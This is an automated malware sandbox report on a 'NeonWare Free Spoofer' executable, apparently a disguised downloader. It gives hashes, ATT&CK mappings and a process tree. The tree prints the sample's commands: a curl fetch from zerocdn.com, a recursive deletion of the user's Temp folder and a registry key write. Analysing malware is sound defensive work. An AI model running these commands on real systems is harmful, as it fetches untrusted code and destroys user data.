83f1f42c79ef91838fc40ca73a459f839c10e3e0fbcfb58a10a360815f16e331

Analysis

max time kernel
121s
max time network
121s
platform
windows7_x64
resource
win7-20240705-en
resource tags

arch:x64arch:x86image:win7-20240705-enlocale:en-usos:windows7-x64system
submitted
23-08-2024 16:02

Target

NeonWare Free Spoofer/Apple.exe
Size

231KB
MD5

2340b8a2bd837a5cff9b309477e482f7
SHA1

9388ce8dd1e17e680e6ccf130e5a07beb06d0df8
SHA256

5e1d6c967328d7b5c61028616420b13c83c3609bdc7667f75bbd923118dca19e
SHA512

f44d430b857a52e39ba9b3d0c831dcf74663351046e472b8c265421e3d05ea14870776a18651658eaa509ccdae8ead2cadce6a54cbf14e625d844d7a933a8259
SSDEEP

3072:wYwfMXIzqQWIY1LgWqoMcwBpdIi6MTBsOzu7m2N943SVMG34DmfGGEbt4m2b3cTd:6fMXIe/14ogFIk3LFCa7k

Score

6^/10

defense_evasion

Indicator Removal: File Deletion 1 TTPs
Adversaries may delete files left behind by the actions of their intrusion activity.
defense_evasion

File Deletion
T1070.004

Suspicious use of WriteProcessMemory 21 IoCs

description	pid	Process	procid_target
PID 2040 wrote to memory of 2864	2040	Apple.exe	31
PID 2040 wrote to memory of 2864	2040	Apple.exe	31
PID 2040 wrote to memory of 2864	2040	Apple.exe	31
PID 2040 wrote to memory of 2368	2040	Apple.exe	32
PID 2040 wrote to memory of 2368	2040	Apple.exe	32
PID 2040 wrote to memory of 2368	2040	Apple.exe	32
PID 2040 wrote to memory of 1996	2040	Apple.exe	33
PID 2040 wrote to memory of 1996	2040	Apple.exe	33
PID 2040 wrote to memory of 1996	2040	Apple.exe	33
PID 2040 wrote to memory of 2052	2040	Apple.exe	34
PID 2040 wrote to memory of 2052	2040	Apple.exe	34
PID 2040 wrote to memory of 2052	2040	Apple.exe	34
PID 2040 wrote to memory of 2304	2040	Apple.exe	35
PID 2040 wrote to memory of 2304	2040	Apple.exe	35
PID 2040 wrote to memory of 2304	2040	Apple.exe	35
PID 2040 wrote to memory of 2340	2040	Apple.exe	36
PID 2040 wrote to memory of 2340	2040	Apple.exe	36
PID 2040 wrote to memory of 2340	2040	Apple.exe	36
PID 2340 wrote to memory of 2344	2340	cmd.exe	37
PID 2340 wrote to memory of 2344	2340	cmd.exe	37
PID 2340 wrote to memory of 2344	2340	cmd.exe	37

C:\Users\Admin\AppData\Local\Temp\NeonWare Free Spoofer\Apple.exe
"C:\Users\Admin\AppData\Local\Temp\NeonWare Free Spoofer\Apple.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2040
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c curl -L http://zerocdn.com/684873183/apple.exe --output -
  2⤵
  PID:2864
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cls
  2⤵
  PID:2368
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c title Apple Cleaner
  2⤵
  PID:1996
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cls
  2⤵
  PID:2052
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c rmdir /S /Q %USERPROFILE%\AppData\Local\Temp > NUL 2>&1
  2⤵
  PID:2304
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add "HKCU\Software\Applehmm" /v "True" /t REG_SZ /d "1" /f > NUL 2>&1
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2340
- - C:\Windows\system32\reg.exe
    reg add "HKCU\Software\Applehmm" /v "True" /t REG_SZ /d "1" /f
    3⤵
    PID:2344

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Indicator Removal

File Deletion

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact